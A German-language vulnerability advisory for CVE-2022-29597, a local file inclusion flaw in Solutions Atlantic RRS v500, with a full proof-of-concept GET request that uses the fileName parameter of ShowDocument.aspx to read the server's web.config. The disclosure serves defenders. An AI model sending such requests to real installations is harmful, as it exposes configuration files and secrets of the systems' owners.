
Die RRS v500 Anwendung ist anfällig für eine Local File Inclusion (LFI) Schwachstelle.
Die RRS v500-Anwendung von Solutions Atlantic ist anfällig für eine Local File Inclusion (LFI)-Schwachstelle. Jeder authentifizierte Benutzer hat die Möglichkeit, interne Systemdateien in Anfragen an die Seite /RRSWeb/maint/ShowDocument/ShowDocument.aspx zu referenzieren. Der Server antwortet erfolgreich mit dem Dateiinhalt der angeforderten internen Systemdatei. Diese Fähigkeit könnte es Angreifern ermöglichen, sensible Daten und/oder Dateien aus dem zugrunde liegenden Dateisystem zu extrahieren, Kenntnisse über die internen Abläufe des Systems zu erlangen oder auf den Quellcode der Anwendung zuzugreifen.
Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597
NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29597
Betroffene URL:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxBeim Öffnen oder Herunterladen eines PDFs von der RRS-Website wird eine Anfrage an die betroffene URL gesendet, die einen fileName-Parameter enthält. Dieser Parameter könnte geändert werden, um einen internen Systempfad wie web.config zu enthalten. Der Server stellt dann die angeforderte Datei bereit.
GET-Anfrage mit internem Pfad zu web.config:
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive
Serverantwort:

April 2022